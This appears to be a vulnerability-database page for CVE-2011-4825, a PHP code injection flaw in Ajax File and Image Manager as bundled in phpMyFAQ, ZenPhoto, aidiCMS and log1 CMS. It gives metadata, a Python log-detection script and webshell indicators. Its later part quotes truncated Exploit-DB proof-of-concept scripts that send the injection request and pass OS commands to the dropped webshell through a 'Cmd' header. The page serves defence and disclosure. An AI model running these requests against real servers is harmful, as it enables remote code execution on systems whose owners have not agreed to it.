CVE-2011-4825
Published: 2011-12-15
Priority: P2 (66, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 40.91% (98.5th percentile)
Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters.
Affected
35 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpletter | ajax_file_and_image_manager | <= 1.0 | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
Detection & IOCs (extracted from sources)
- Detect POST requests to any path ending in 'ajax_create_folder.php': this is the universal injection entry point across all affected products (log1 CMS, phpMyFAQ, aidiCMS, ZenPhoto).
- Detect subsequent GET requests to 'inc/data.php' under any ajaxfilemanager path: this is the webshell execution step after successful injection.
- Detect the custom 'Cmd' HTTP header in GET requests to data.php: exploit PoCs use this header to pass base64-encoded OS commands to the dropped webshell.
- Match the regex pattern '/_code_(.*)/s' in HTTP responses from data.php: exploit PoCs use this delimiter to extract command output from the webshell.
- The vulnerability is exploitable without authentication in some affected products (e.g., aidiCMS, ZenPhoto), but requires valid admin credentials in phpMyFAQ; authentication state affects detection logic.
- The ajaxfilemanager component is embedded at different sub-paths depending on the host CMS (log1 CMS, phpMyFAQ, aidiCMS, ZenPhoto, tinymce); detection rules must use wildcard path matching rather than fixed paths.
- The Metasploit module targets log1 CMS 2.0 with a default TARGETURI of '/log1cms2.0/'; other deployments will use different base paths.
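The first two detection points above, run over constructed access-log lines, as an added example (this code is not from the page, from Exploit-DB or from any affected product). It assumes combined-format web-server logs; the 'Cmd' request header and the '_code_' response marker are not visible in ordinary access logs and would need a proxy or WAF log, so they are not matched here. Paths are matched by suffix, per the wildcard-path note, and a GET to data.php that follows a POST to ajax_create_folder.php from the same client within a short window is reported as a correlated sequence, the highest-confidence hit.

```python
"""Detection logic for CVE-2011-4825 exploitation attempts over
constructed web-server access-log lines.  Added example for this page,
not part of any referenced exploit or product.

Signals implemented:
  1. POST to any path ending in ajax_create_folder.php (injection step)
  2. GET to <...>/ajaxfilemanager/inc/data.php       (webshell execution step)
A GET (2) following a POST (1) from the same client within
CORRELATION_WINDOW is emitted as a third, correlated alert.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Suffix matching: the component sits at a different sub-path in each CMS.
CREATE_FOLDER_RE = re.compile(r'/ajax_create_folder\.php(?:\?.*)?$')
DATA_PHP_RE = re.compile(r'/ajaxfilemanager/inc/data\.php(?:\?.*)?$')

CORRELATION_WINDOW = timedelta(minutes=10)  # assumed tuning value


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for unparseable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def classify(rec: dict) -> Optional[str]:
    """Return the signal name a single request matches, or None."""
    if rec["method"] == "POST" and CREATE_FOLDER_RE.search(rec["path"]):
        return "inject_attempt"
    if rec["method"] == "GET" and DATA_PHP_RE.search(rec["path"]):
        return "webshell_access"
    return None


def detect(lines: List[str]) -> List[dict]:
    """Scan log lines in order; emit per-request alerts plus correlated sequences."""
    alerts: List[dict] = []
    last_inject: Dict[str, datetime] = {}  # client ip -> time of last POST hit
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sig = classify(rec)
        if sig is None:
            continue
        alerts.append({"ip": rec["ip"], "signal": sig, "path": rec["path"]})
        if sig == "inject_attempt":
            last_inject[rec["ip"]] = rec["ts"]
        elif rec["ip"] in last_inject and rec["ts"] - last_inject[rec["ip"]] <= CORRELATION_WINDOW:
            alerts.append({"ip": rec["ip"], "signal": "inject_then_webshell", "path": rec["path"]})
    return alerts


# Constructed sample log lines (not real traffic); the sub-paths mirror the
# ones named in the exploit excerpts on this page.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Nov/2011:10:00:01 +0000] "GET /phpmyfaq/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Nov/2011:10:00:05 +0000] "POST /phpmyfaq/admin/editor/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0" 200 12 "-" "-"',
    '198.51.100.7 - - [05/Nov/2011:10:00:09 +0000] "GET /phpmyfaq/admin/editor/plugins/ajaxfilemanager/inc/data.php HTTP/1.0" 200 88 "-" "-"',
    '203.0.113.4 - - [05/Nov/2011:11:30:00 +0000] "GET /zenphoto/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.1" 200 40 "-" "curl/7.21"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A lone GET to data.php is worth an alert on its own: that file is not a normal user-facing endpoint, and on an unpatched install it may already hold injected code from an earlier request that fell outside the log window.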
No detection rules found.
Exploit-DB · 2012-06-03
Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Log1 CMS writeInfo() PHP Code Injection",
'Description' => %q{
This module exploits the "Ajax File and Image Manager" component that can be
found in log1 CMS. In function.base.php of this component, the 'data' parameter
in writeInfo() allows any malicious user to have direct control of writing data
to file data.php, which results in arbitrary remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Found the bug in ajax
```
Exploit-DB · 2011-11-24
Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution
---
```php
|";
print "\n| Example....: php $argv[0] localhost / |";
print "\n| Example....: php $argv[0] localhost /log1cms/ |";
print "\n+------------------------------------------------------------------------+\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r
```
Exploit-DB · 2011-11-05
PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution
---
```php
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpmyfaq/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "faqusername={$argv[3]}&faqpassword={$argv[4]}";
$packet = "POST {$path}?action=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pmf_auth=foo\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/pmf_auth=([^;]*);/", http_send($host, $packet), $auth)) die("\n[-] Login failed!\n");
$packet = "GET {$path}admin/editor/plugins/ajaxfilemanager/ajax_login.php HTTP/1.0\r\n";
$packet .= "Host: {$
```
Exploit-DB · 2011-11-05
aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
---
```php
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /aidicms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\naidicms-shell#
```
Exploit-DB · 2011-11-05
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
---
```php
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /zenphoto/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n
```
Exploit-DB · 2011-11-04
Ajax File and Image Manager 1.0 Final - Remote Code Execution
---
Ajax File and Image Manager v1.0 Final Remote Code Execution Vulnerability
author...........: Egidio Romano aka EgiX
mail.............: n0b0d13s[at]gmail[dot]com
software link....: http://www.phpletter.com/
[-] Vulnerability explanation:
The vulnerable code is located in /ajaxfilemanager/ajax_create_folder.php:
```php
11. @ob_start();
12. displayArray($_POST);
13. writeInfo(@ob_get_clean());
```
This script starts the output buffering at line 11 and then calls the 'displayArray'
function, which simply displays the $_POST array content with the print_r() function;
finally, at line 13, the 'writeInfo' function is called using the current buffer
contents as parameter (that is, the $_POST array content). Now look at the 'writeInfo'
Metasploit
Log1 CMS writeInfo() PHP Code Injection
This module exploits the "Ajax File and Image Manager" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.
No writeups or analysis indexed.
References
- http://www.exploit-db.com/exploits/18075
- http://www.phpletter.com/en/DOWNLOAD/1/
- http://www.phpmyfaq.de/advisory_2011-10-25.php
- http://www.securityfocus.com/bid/50523
- http://www.zenphoto.org/trac/ticket/2005